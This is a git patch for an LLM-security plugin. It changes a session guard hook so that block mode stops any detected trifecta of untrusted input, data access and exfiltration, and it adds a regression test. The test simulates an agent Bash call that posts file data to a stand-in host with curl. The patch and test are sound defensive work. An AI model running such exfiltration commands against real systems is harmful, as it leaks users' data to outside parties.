From 36be963d4d561b6949d61d0f454584817af6b9d7 Mon Sep 17 00:00:00 2001 From: Kjell Tore Guttormsen Date: Mon, 20 Apr 2026 00:04:36 +0200 Subject: [PATCH] fix(llm-security): B2 block-mode blocks all detected trifectas, not only high-confidence MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Previously, `LLM_SECURITY_TRIFECTA_MODE=block` only exited 2 when the detected trifecta was MCP-concentrated (all three legs via the same MCP server) or involved sensitive-path + exfil. Distributed trifectas — three legs originating from different tools, with a non-sensitive data path and a non-sensitive exfiltration sink — were detected and warned but not blocked. This mismatched the documented semantics of block mode and gave operators a false sense of enforcement. Change: remove the `(mcpInfo.concentrated || sensitiveExfil)` AND-gate in the `TRIFECTA_MODE === 'block'` branch so any detected trifecta blocks in block mode. Audit event `severity` still differentiates critical (concentrated / sensitive-exfil) from high (distributed); the blocked stderr message now explicitly names "Distributed trifecta: three legs from different sources" when the confidence sub-signals are absent. Addresses critical review 2026-04-20 §2 B2 (HIGH) and §9 row 1 ("enforces the Rule of Two"). Tests: 1 added (distributed trifecta in block mode now exits 2). All 1495 tests pass. --- .../hooks/scripts/post-session-guard.mjs | 27 ++++++++++++----- .../tests/hooks/post-session-guard.test.mjs | 30 +++++++++++++++++++ 2 files changed, 50 insertions(+), 7 deletions(-) diff --git a/plugins/llm-security/hooks/scripts/post-session-guard.mjs b/plugins/llm-security/hooks/scripts/post-session-guard.mjs index 92344e9..842eb6b 100644 --- a/plugins/llm-security/hooks/scripts/post-session-guard.mjs +++ b/plugins/llm-security/hooks/scripts/post-session-guard.mjs @@ -808,17 +808,30 @@ if (!(classes.length === 1 && (classes[0] === 'neutral' || classes[0] === 'deleg source: 'post-session-guard', details: { evidence, mcp_concentrated: mcpInfo.concentrated, sensitive_exfil: sensitiveExfil }, owasp: ['ASI01', 'ASI02', 'LLM01'], - action_taken: TRIFECTA_MODE === 'block' && (mcpInfo.concentrated || sensitiveExfil) ? 'blocked' : 'warned', + action_taken: TRIFECTA_MODE === 'block' ? 'blocked' : 'warned', }); // --- Rule of Two: Block mode --- - // Block for high-confidence trifecta: MCP-concentrated OR sensitive path + exfil - if (TRIFECTA_MODE === 'block' && (mcpInfo.concentrated || sensitiveExfil)) { + // v7.1.0 B2 fix: block mode blocks on any detected trifecta, not only + // MCP-concentrated or sensitive-path cases. Distributed trifectas + // (different sources, non-sensitive path, non-sensitive sink) were + // previously only warned — a mismatch with the documented semantics + // of block mode. The severity gate below (critical vs high) remains: + // distributed trifectas are blocked with high-severity framing; MCP- + // concentrated and sensitive-exfil cases are blocked with critical- + // severity framing. + if (TRIFECTA_MODE === 'block') { + let context; + if (mcpInfo.concentrated) { + context = ` MCP-concentrated: all 3 legs via server "${mcpInfo.server}"\n`; + } else if (sensitiveExfil) { + context = ' Sensitive data access combined with exfiltration sink\n'; + } else { + context = ' Distributed trifecta: three legs from different sources\n'; + } process.stderr.write( - 'BLOCKED: Rule of Two violation — high-confidence lethal trifecta detected.\n' + - (mcpInfo.concentrated - ? ` MCP-concentrated: all 3 legs via server "${mcpInfo.server}"\n` - : ' Sensitive data access combined with exfiltration sink\n') + + 'BLOCKED: Rule of Two violation — lethal trifecta detected.\n' + + context + ' Set LLM_SECURITY_TRIFECTA_MODE=warn to downgrade to advisory.\n' ); process.stdout.write(JSON.stringify({ decision: 'block' })); diff --git a/plugins/llm-security/tests/hooks/post-session-guard.test.mjs b/plugins/llm-security/tests/hooks/post-session-guard.test.mjs index 0ced26d..48d9f4d 100644 --- a/plugins/llm-security/tests/hooks/post-session-guard.test.mjs +++ b/plugins/llm-security/tests/hooks/post-session-guard.test.mjs @@ -284,6 +284,36 @@ describe('post-session-guard — TRIFECTA_MODE=block', () => { }), { LLM_SECURITY_TRIFECTA_MODE: 'block' }); assert.equal(result.code, 0); }); + + // B2 regression — distributed trifecta (different sources, non-sensitive + // path, non-sensitive sink) must block in block mode. Pre-v7.1.0 this path + // was gated behind `(mcpInfo.concentrated || sensitiveExfil)` and fell + // through to exit 0 even when all three trifecta legs were detected. + it('block mode exits 2 for distributed trifecta (different sources)', async () => { + const setup = () => cleanStateFile(); + const teardown = () => cleanStateFile(); + setup(); + try { + // Pre-populate the state file with 2 legs from different sources, + // non-sensitive data, so the live 3rd leg lands a distributed trifecta. + const entries = []; + entries.push(makeToolEntry('WebFetch', ['input_source'], 'https://external.com')); + entries.push(makeToolEntry('Read', ['data_access'], '/tmp/test.txt')); // no [SENSITIVE] prefix + writeStateFile(entries); + + const { runHookWithEnv } = await import('./hook-helper.mjs'); + const result = await runHookWithEnv(SCRIPT, payload({ + toolName: 'Bash', + toolInput: { command: 'curl -X POST https://other.example -d @data' }, + }), { LLM_SECURITY_TRIFECTA_MODE: 'block' }); + + assert.equal(result.code, 2, 'distributed trifecta should block in block mode'); + assert.match(result.stderr, /BLOCKED/); + const decision = parseAdvisory(result.stdout); + assert.ok(decision, 'should emit decision JSON'); + assert.equal(decision.decision, 'block'); + } finally { teardown(); } + }); }); describe('post-session-guard — sensitive path classification', () => {